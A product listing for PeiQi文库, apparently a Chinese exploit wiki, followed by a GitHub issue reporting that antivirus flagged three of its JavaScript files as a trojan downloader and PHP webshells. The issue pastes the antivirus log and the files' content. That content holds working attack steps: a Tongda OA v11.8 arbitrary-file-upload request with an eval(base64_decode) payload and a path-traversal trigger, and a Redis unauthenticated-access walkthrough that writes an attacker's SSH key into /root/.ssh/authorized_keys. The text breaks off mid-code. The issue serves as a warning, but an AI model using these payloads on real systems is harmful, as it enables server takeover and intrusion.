CurateClick

PeiQi文库

PeiQi文库是一个技术文档库,包含各种漏洞利用和攻击技术的详细说明。

Check out PeiQi文库 on CurateClick

• Copy the embed code to showcase this product on your website

• Share on X to spread the word about this amazing tool

Visit WebsiteView on GitHub

issue #2635 推荐资源页面中的链接“PeiQi文库”包含恶意攻击载荷:http://wiki.peiqi.tech/assets/js/9.2369a4c5.jshttp://wiki.peiqi.tech/assets/js/113.e7ee5e11.js http://wiki.peiqi.tech/assets/js/408.6bd2b286.js火绒安全日志如下:```text【3】2022-09-25 21:41:23,病毒防护,WEB扫描,发现病毒TrojanDownloader/PS.NetLoader.aw, 已阻止病毒名称:TrojanDownloader/PS.NetLoader.aw病毒ID:53F2750F99F235F6病毒URL:http://wiki.peiqi.tech/assets/js/9.2369a4c5.js操作结果:已阻止进程ID:18156操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>【4】2022-09-25 21:41:05,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.d, 已阻止病毒名称:HEUR:Backdoor/PHP.WebShell.d病毒ID:38B63BB3B1F6D704病毒URL:http://wiki.peiqi.tech/assets/js/408.6bd2b286.js操作结果:已阻止进程ID:18156操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>【5】2022-09-25 21:40:34,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.a, 已阻止病毒名称:HEUR:Backdoor/PHP.WebShell.a病毒ID:ED9F80E4A8E762B9病毒URL:http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js操作结果:已阻止进程ID:18156操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js内容如下:text(window.webpackJsonp=window.webpackJsonp||[]).push([[113],{1737:function(t,a,s){t.exports=s.p+"assets/img/1628303888717-4ffc91a6-e87e-4e00-8bd5-b2218bb0772a.70c7bdb3.png"},1738:function(t,a,s){t.exports=s.p+"assets/img/1630513004438-e5a73ef6-8d65-40a1-9a3c-3be30cd7d164.da74a076.png"},1739:function(t,a,s){t.exports=s.p+"assets/img/1630513044174-8139c404-4f11-404e-be04-42d86b407bdd.420a6145.png"},1740:function(t,a,s){t.exports=s.p+"assets/img/1630513283771-36cc86c7-a150-4834-be64-243b20938165.83dcea54.png"},2828:function(t,a,s){"use strict";s.r(a);var r=s(75),n=Object(r.a)({},(function(){var t=this,a=t.$createElement,r=t._self._c||a;return r("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[r("h1",{attrs:{id:"通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[t._v("#")]),t._v(" 通达OA v11.8 api.ali.php 任意文件上传漏洞")]),t._v(" "),r("h2",{attrs:{id:"漏洞描述"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞描述"}},[t._v("#")]),t._v(" 漏洞描述")]),t._v(" "),r("p",[t._v("通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器")]),t._v(" "),r("h2",{attrs:{id:"漏洞影响"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞影响"}},[t._v("#")]),t._v(" 漏洞影响")]),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("通达OA v11.8")]),r("br"),t._v(" "),r("h2",{attrs:{id:"漏洞复现"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞复现"}},[t._v("#")]),t._v(" 漏洞复现")]),t._v(" "),r("p",[t._v("登陆页面")]),t._v(" "),r("p",[r("img",{attrs:{src:s(1737),alt:"img"}})]),t._v(" "),r("p",[t._v("像 api.ali.php 发送请求包")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[t._v("POST "),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("mobile"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("ali"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php HTTP"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nHost"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" \nUser"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Agent"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" Go"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("http"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("client"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Length"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" "),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("422")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" multipart"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" boundary"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),t._v("502f67681799b07e4de6b503655f5cae\nAccept"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Encoding"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" gzip\n\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Disposition"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" name"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"file"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" filename"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"fb6790f4.json"')]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" application"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("octet"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("stream\n\n"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("{")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"modular"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"AllVariable"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"a"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw=="')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"dataAnalysis"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/\"}"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("}")]),t._v("\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br"),r("span",{staticClass:"line-number"},[t._v("2")]),r("br"),r("span",{staticClass:"line-number"},[t._v("3")]),r("br"),r("span",{staticClass:"line-number"},[t._v("4")]),r("br"),r("span",{staticClass:"line-number"},[t._v("5")]),r("br"),r("span",{staticClass:"line-number"},[t._v("6")]),r("br"),r("span",{staticClass:"line-number"},[t._v("7")]),r("br"),r("span",{staticClass:"line-number"},[t._v("8")]),r("br"),r("span",{staticClass:"line-number"},[t._v("9")]),r("br"),r("span",{staticClass:"line-number"},[t._v("10")]),r("br"),r("span",{staticClass:"line-number"},[t._v("11")]),r("br"),r("span",{staticClass:"line-number"},[t._v("12")]),r("br"),r("span",{staticClass:"line-number"},[t._v("13")]),r("br")])]),r("a-checkbox",{attrs:{checked:""}},[t._v("参数a base解码")]),r("br"),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');")]),r("br"),t._v(" "),r("p",[r("img",{attrs:{src:s(1738),alt:"img"}})]),t._v(" "),r("p",[t._v("再发送GET请求写入文件")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("inc"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("package"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("work"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php?"),r("span",{pre:!0,attrs:{class:"token builtin"}},[t._v("id")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("myoa"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("attach"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("approve_center"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("2109")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("fb6790f4\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br")])]),r("p",[r("img",{attrs:{src:s(1739),alt:"img"}})]),t._v(" "),r("p",[t._v("其中请求中对 2109 为 年月,路径为 "),r("code",[t._v("/fb6790f4.php,")])]),t._v(" "),r("p",[r("img",{attrs:{src:s(1740),alt:"img"}})])],1)}),[],!1,null,null,null);a.default=n.exports}}]);http://wiki.peiqi.tech/assets/js/9.2369a4c5.js内容如下:text(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{1024:function(s,t,a){s.exports=a.p+"assets/img/1628511265889-a89c273a-fa98-458c-b7d0-8a61b9098cc2-20220415143203556.794335ca.png"},1025:function(s,t,a){s.exports=a.p+"assets/img/1628511872365-61010be1-642a-4a70-8390-1de94a771e5b-20220415143203424.c66d4dbb.png"},1026:function(s,t,a){s.exports=a.p+"assets/img/1628511715038-57addcaa-bed5-4db8-a030-acafc228ba79-20220415143203457.eef9b57a.png"},1027:function(s,t,a){s.exports=a.p+"assets/img/1628512967608-9d62672c-9db3-4b07-94ad-70d03edf02b7-20220415143203434.9897afb6.png"},1028:function(s,t,a){s.exports=a.p+"assets/img/1628513275098-e5bcd6c4-3c19-4aaa-b2c1-90bd3d3b4a4e-20220415143203451.151e7ac3.png"},1029:function(s,t,a){s.exports=a.p+"assets/img/1628514409894-848f4f59-3b45-449a-8566-c204aed32354-20220415143203297.fba85c78.png"},1030:function(s,t,a){s.exports=a.p+"assets/img/1628515307073-5d1f3553-587e-476a-9556-beb3c9eb54bf-20220415143203556.3c3cade0.png"},1031:function(s,t,a){s.exports=a.p+"assets/img/1628515979062-1d027d69-3100-4eb9-9496-43b0b15a7768-20220415143203717.9a8e8d57.png"},1032:function(s,t,a){s.exports=a.p+"assets/img/1628603729549-61622428-de4c-4dbf-abdb-7ceb5c0d6240-20220415143203493.808174aa.png"},1033:function(s,t,a){s.exports=a.p+"assets/img/1628608226504-a9981cc4-1dae-4c85-9468-39bd3f030305-20220415143203642.bd3538c3.png"},1034:function(s,t,a){s.exports=a.p+"assets/img/1628608233667-192fed23-55a2-43a8-88df-75cc7d9d0b9b-20220415143203584.357b75de.png"},1035:function(s,t,a){s.exports=a.p+"assets/img/1628609553023-5e320f71-cea1-4ade-ad72-f1e0f51f7f11-20220415143203567.5bb58bce.png"},1036:function(s,t,a){s.exports=a.p+"assets/img/1628609873998-b83c9a14-4307-45fb-8c50-f46b79d85f86-20220415143203676.f3e64db5.png"},1037:function(s,t,a){s.exports=a.p+"assets/img/1628609802263-2105839f-6645-428b-82d4-bbb75b3dadb9-20220415143203681.8b806788.png"},1038:function(s,t,a){s.exports=a.p+"assets/img/1628610432546-2e313488-1ab1-42f2-bf37-fb074693c30a-20220415151326919.eba8b536.png"},1039:function(s,t,a){s.exports=a.p+"assets/img/1628682645780-adbda105-6e56-481d-a4c9-b34e6bd5908b-20220415143203710.60230d0b.png"},2586:function(s,t,a){"use strict";a.r(t);var e=a(75),r=Object(e.a)({},(function(){var s=this,t=s.$createElement,e=s._self._c||t;return e("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[e("h1",{attrs:{id:"redis-6379端口"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#redis-6379端口"}},[s._v("#")]),s._v(" Redis 6379端口")]),s._v(" "),e("h2",{attrs:{id:"关于"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#关于"}},[s._v("#")]),s._v(" 关于")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器")]),e("br"),s._v(" "),e("h2",{attrs:{id:"攻击方法"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#攻击方法"}},[s._v("#")]),s._v(" 攻击方法")]),s._v(" "),e("p",[s._v("要成功的利用Redis未授权访问的漏洞需要如下几点")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis服务以root账户运行")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis无密码或弱密码进行认证")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis监听在0.0.0.0公网上或内网中")]),e("br"),s._v(" "),e("p",[s._v("首先可以使用 Nmap的检测脚本 对 Redis进行未授权检测")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("nmap "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("A")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v(" –script redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("info "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("也可以使用其他工具进行扫描")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1024),alt:"img"}})]),s._v(" "),e("p",[s._v("连接数据库查看 info, 确定未授权访问")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1025),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1026),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"linux-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#linux-获取权限"}},[s._v("#")]),s._v(" Linux 获取权限")]),s._v(" "),e("h3",{attrs:{id:"ssh公钥"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#ssh公钥"}},[s._v("#")]),s._v(" SSH公钥")]),s._v(" "),e("p",[s._v("生成密钥在攻击机中")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("ssh"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("keygen "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("t rsa\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1027),alt:"img"}})]),s._v(" "),e("p",[s._v("将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" cat id_rsa"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("pub"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("txt\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1028),alt:"img"}})]),s._v(" "),e("p",[s._v("再把 key.txt 文件内容写入目标主机的缓冲里")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("cat key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("txt")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("redis")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("x set test \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1029),alt:"img"}}),s._v("\n再通过设置参数,写入指定文件")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("┌──"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("root💀kali"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("~")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n└─"),e("span",{pre:!0,attrs:{class:"token comment"}},[s._v("# redis-cli -h 192.168.0.126 -p 6379")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("root"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename authorized_keys\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" keys "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("1")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"test"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" get test\n"),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n\nssh-rsa xxxxxxxxxxxx \n\n\n\n"')]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" save\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token 